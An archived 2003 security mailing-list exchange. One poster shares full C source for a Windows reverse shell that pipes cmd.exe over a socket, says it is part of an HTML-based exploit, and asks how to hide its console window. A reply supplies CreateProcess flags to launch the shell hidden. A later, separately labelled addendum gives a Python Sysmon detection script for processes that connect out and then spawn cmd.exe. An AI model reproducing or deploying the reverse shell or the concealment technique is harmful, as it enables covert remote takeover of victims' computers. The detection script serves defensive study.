Re: freeconsole()

From: sk (sk@scan-associates.net)
Date: Thu Feb 27 2003 - 18:50:12 PST

    You may want to try:
    
    si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
    FreeConsole();
    CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
    
    To make sure the newly created process starts with SW_HIDE.
    
    sk
    ----- Original Message -----
    From: "Mike Mires" <poc_sploitat_private>
    To: <pentestat_private>
    Cc: <vuln-devat_private>
    Sent: Wednesday, February 26, 2003 6:25 PM
    Subject: freeconsole()
    
    
    > Hi all,
    >
    > I am using a basic reverse shell written in C as part of an HTML-based
    > exploit recently revealed by malware.com. It uses WSAStartup() and
    > CreateProcess(). I'm looking for a way to hide the console created by
    > CreateProcess. I've tried freeconsole() with no params as suggested by
    > some sources, however this does not work.
    >
    > Any ideas would be appreciated.
    >
    > Thanks
    >
    > P.S. code I'm using is
    >
    >
    > #include <winsock2.h>
    > #include <stdio.h>
    > #include <windows.h>
    > #pragma comment(lib,"ws2_32")
    >
    >
    >
    > void main(int argc, char *argv[])
    > {
    > // FreeConsole();
    >
    >
    >         WSADATA wsaData;
    >         SOCKET hSocket;
    >         STARTUPINFO si;
    >         PROCESS_INFORMATION pi;
    >
    >         struct sockaddr_in adik_sin;
    >         memset(&adik_sin,0,sizeof(adik_sin));
    >         memset(&si,0,sizeof(si));
    >         WSAStartup(MAKEWORD(2,0),&wsaData);
    >         hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
    >         adik_sin.sin_family = AF_INET;
    >         adik_sin.sin_port = htons(55);
    >         adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    >         connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
    >         si.cb = sizeof(si);
    >         si.dwFlags = STARTF_USESTDHANDLES;
    >         si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
    >
    >         CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
    >
    >
    >
    > ExitProcess(0);
    >
    > }
    >
    >
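Added example for defenders, not part of either post: a hidden window leaves no trace in process-creation telemetry, so this check keys on what the code in the thread cannot avoid, a process that opens an outbound connection and then spawns `cmd` as its child. The records are constructed samples using Sysmon field names; the image paths, GUIDs and the 5-second window are assumptions.

```python
from datetime import datetime, timedelta

SHELLS = {"cmd.exe"}            # child images of interest (the thread spawns "cmd")
WINDOW = timedelta(seconds=5)   # assumed gap between connect() and CreateProcess()

# Constructed sample records using Sysmon field names
# (EventID 3 = network connection, EventID 1 = process creation).
EVENTS = [
    {"EventID": 3, "UtcTime": "2003-02-27 10:00:00.100", "ProcessGuid": "{A-1}",
     "Image": r"C:\Temp\viewer.exe", "Initiated": "true",
     "DestinationIp": "127.0.0.1", "DestinationPort": "55"},
    {"EventID": 1, "UtcTime": "2003-02-27 10:00:00.150", "ProcessGuid": "{A-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd",
     "ParentProcessGuid": "{A-1}", "ParentImage": r"C:\Temp\viewer.exe"},
    # Interactive shell started from Explorer; the parent made no connection.
    {"EventID": 1, "UtcTime": "2003-02-27 10:01:00.000", "ProcessGuid": "{B-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe",
     "ParentProcessGuid": "{B-1}", "ParentImage": r"C:\Windows\explorer.exe"},
    # Parent connected two minutes before spawning the shell: outside WINDOW.
    {"EventID": 3, "UtcTime": "2003-02-27 10:05:00.000", "ProcessGuid": "{C-1}",
     "Image": r"C:\Tools\updater.exe", "Initiated": "true",
     "DestinationIp": "192.0.2.10", "DestinationPort": "443"},
    {"EventID": 1, "UtcTime": "2003-02-27 10:07:00.000", "ProcessGuid": "{C-2}",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c ver",
     "ParentProcessGuid": "{C-1}", "ParentImage": r"C:\Tools\updater.exe"},
]

def _ts(event):
    return datetime.strptime(event["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")

def find_socket_shells(events, window=WINDOW):
    """Return (parent image, destination, child command line) for every shell
    created within `window` after its parent opened an outbound connection."""
    last_conn = {}   # ProcessGuid -> (time of latest outbound connect, "ip:port")
    hits = []
    for e in sorted(events, key=_ts):
        if e["EventID"] == 3 and e.get("Initiated") == "true":
            dest = f'{e["DestinationIp"]}:{e["DestinationPort"]}'
            last_conn[e["ProcessGuid"]] = (_ts(e), dest)
        elif e["EventID"] == 1:
            child = e["Image"].rsplit("\\", 1)[-1].lower()
            conn = last_conn.get(e["ParentProcessGuid"])
            if child in SHELLS and conn and _ts(e) - conn[0] <= window:
                hits.append((e["ParentImage"], conn[1], e["CommandLine"]))
    return hits

if __name__ == "__main__":
    for parent, dest, cmdline in find_socket_shells(EVENTS):
        print(f"{parent} -> {dest} then spawned: {cmdline}")
```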
    


